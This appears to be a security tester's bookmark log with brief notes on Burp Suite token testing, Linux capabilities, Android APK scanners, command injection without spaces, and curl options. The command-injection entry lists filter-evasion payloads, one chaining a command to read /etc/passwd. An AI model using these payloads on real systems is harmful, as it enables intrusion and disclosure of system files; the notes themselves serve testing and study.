-
Using Burp to Test Session Token Generation | Burp Suite Support Center
January 15, 2019 at 3:13:10 PM UTC - permalink -Burp Decoder : Send the token to the Decoder and try to decode the string
Burp Sequencer : Send request to sequencer and "Start Live Capture"
"Burp Sequencer will repeatedly issue the request and extract the relevant token from the application's responses."Burp Intruder : Send request to Intruder, and select either "Character frobber" or "Bit flipper" payload type and then start attack.
The "Character frobber" payload type operates on a string input and modifies the value of each character position in turn.- https://support.portswigger.net/customer/portal/articles/1964169-using-burp-to-test-session-token-generation
-
-
-
http://blog.sevagas.com/IMG/pdf/exploiting_capabilities_the_dark_side.pdf
December 28, 2018 at 12:56:28 PM UTC - permalink -e: Effective
This means the capability is “activated”.p: Permitted
This means the capability can be used/is allowed.i: Inherited
The capability is kept by child/subprocesses upon execve() for example.- http://blog.sevagas.com/IMG/pdf/exploiting_capabilities_the_dark_side.pdf
-
-
-
-
NVISO ApkScan - Scan Android applications for malware
December 18, 2018 at 4:36:54 PM UTC * - permalink -www.decompileandroid.com
www.virustotal.com
https://github.com/pjlantz/droidbox- https://apkscan.nviso.be/
-
-
-
Command Injection Without Spaces
December 10, 2018 at 4:43:56 PM UTC - permalink -{echo,hello,world}
CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20a\x20b\x20c'&&echo$CMD
google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD- https://www.betterhacker.com/2016/10/command-injection-without-spaces.html
-
curl - Tutorial
December 6, 2018 at 3:19:22 PM UTC - permalink ---user-agent
-X POST
--user username:password // HTTP basic auth
--data "username=toto&password=toto" // for POST method
--cookie "data=mydata"
--referer "my referer"- https://curl.haxx.se/docs/httpscripting.html